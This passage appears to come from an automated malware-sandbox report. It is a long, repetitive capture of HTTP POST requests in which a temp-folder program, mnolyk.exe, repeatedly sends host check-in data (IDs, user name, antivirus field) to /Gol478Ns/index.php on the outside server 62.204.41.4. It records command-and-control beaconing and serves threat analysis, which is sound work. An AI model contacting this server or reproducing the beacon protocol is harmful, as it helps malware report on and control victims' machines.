                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:54.772594929 CET812INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:54 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          658192.168.2.65038362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:54.971539021 CET812OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:55.034483910 CET813INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:54 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          659192.168.2.65038462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:55.223735094 CET813OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:55.290314913 CET814INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:55 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          66192.168.2.64978662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:08.155419111 CET186OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:08.219896078 CET186INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:08 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          660192.168.2.65038562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:55.477920055 CET814OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:55.540327072 CET815INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:55 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          661192.168.2.65038662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:55.723367929 CET815OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:55.788414001 CET816INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:55 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          662192.168.2.65038762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:55.955538034 CET816OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:56.021003008 CET817INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:55 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          663192.168.2.65038862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:56.189945936 CET817OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:56.253367901 CET818INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:56 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          664192.168.2.65038962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:56.428558111 CET818OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:56.491966963 CET819INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:56 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          665192.168.2.65039062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:56.676042080 CET819OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:56.739432096 CET820INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:56 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          666192.168.2.65039162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:56.919310093 CET820OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:56.983447075 CET821INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:56 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          667192.168.2.65039262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:57.167562008 CET821OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:57.233685017 CET822INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:57 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          668192.168.2.65039362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:57.421089888 CET822OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:57.485174894 CET823INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:57 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          669192.168.2.65039462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:57.671451092 CET823OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:57.734373093 CET824INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:57 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          67192.168.2.64978762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:09.515244007 CET187OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:09.579471111 CET187INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:09 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          670192.168.2.65039562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:57.910151958 CET824OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:57.974123001 CET825INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:57 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          671192.168.2.65039662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:58.143968105 CET825OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:58.209055901 CET826INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:58 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          672192.168.2.65039762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:58.395000935 CET826OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:58.457931995 CET827INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:58 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          673192.168.2.65039862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:58.636270046 CET827OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:58.701895952 CET828INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:58 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          674192.168.2.65039962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:58.878195047 CET828OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:58.941330910 CET829INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:58 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          675192.168.2.65040062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:59.133076906 CET829OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:59.198379993 CET830INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:59 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          676192.168.2.65040162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:59.377763987 CET830OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
